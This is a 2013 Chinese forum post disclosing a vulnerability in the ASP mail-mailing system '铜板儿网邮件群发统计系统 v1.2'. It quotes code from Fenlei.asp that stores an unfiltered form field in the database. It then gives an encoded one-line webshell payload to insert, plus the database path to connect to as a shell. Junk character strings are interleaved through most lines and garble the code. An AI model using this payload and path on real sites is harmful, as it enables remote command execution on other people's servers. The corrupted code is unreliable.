找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1950|回复: 0
打印 上一主题 下一主题

铜板儿网邮件群发统计系统 v1.2 漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:14:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
'Fenlei.asp * T* @* i3 m; n2 H/ y8 u

8 r, E6 X) N6 I6 \  z% z, RIF Request.QueryString("Action")="del" Then   W3 L( E- Y+ Q( [! ~
ID=Request.QueryString("ID")
5 }7 X: U  V) i- {/ h1 q7 B/ TIF Countss ("tui","Fenlei",ID )<>0 then
( l7 H/ r# q" @'略 : j$ d8 L( @: m$ Q" i+ ]  U' I$ c
IF Request.QueryString("Action")="Add" Then
* k' M2 J2 T7 D6 c3 H& LTname=Request.Form("Typename") 0 H+ p. Z) ~. x8 X( U0 e+ D
Set Rs=Server.CreateObject("adodb.Recordset") ; q4 J/ Q- c7 f: k- x
Sql="Select * From Fenlei Order by id Desc "
. `1 M$ k3 \3 P& L" k4 I/ n3 {Rs.Open Sql,Conn,1,3 & Q8 z+ m& B$ v$ s
Rs.Addnew
) o# k5 R  j0 S' G/ ^! N2 A' PRs("Typename")=Tname
% O. S# w7 \* k2 r) u6 s0 N'略 4 B1 o1 R) T" O
Set Rs=Server.CreateObject("adodb.Recordset")
3 |0 U+ {  c/ tSql="Select * From Fenlei Order by id Desc " % y5 L6 Y- e( d( G# B4 O  b$ _
Rs.Open Sql,Conn,1,1
' w, C- R* h8 k/ N' p4 ]( G  f! n'略
4 w0 t! Q9 s5 ^/ D%>! K) D4 Q4 A9 y2 }4 r, |
5 U/ W# d0 j& K4 l8 u0 ^, L5 }

. L3 T8 {' W& R # n/ U" j6 y. }% h  u
没有过滤,直接写入数据库。
% q! [) L' ~  f$ ]% @
- }0 u# \. g1 P( A. {! `! Z. C利用方法:
$ ?7 {5 ]; d' F1 ?7 d1 w7 E & a6 K0 F+ q8 y6 O1 d) v
插入:┼攠數畣整爠煥敵瑳∨≡┩>
9 G; K# g: L  w, Q9 P4 l 5 |. f+ w, u- O2 X& \3 d* ]
* s: S, \3 Y) @' ~  H. H
连接: http://www.xxx.com/###tongbaner.asa
4 z8 {7 v+ R- y& U) ^- L'默认安装文件: 6 f* R$ L+ k1 G8 Z5 T( Q% L
'install.asp7 `7 K0 n4 G# [( D$ Y, B  o/ h
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表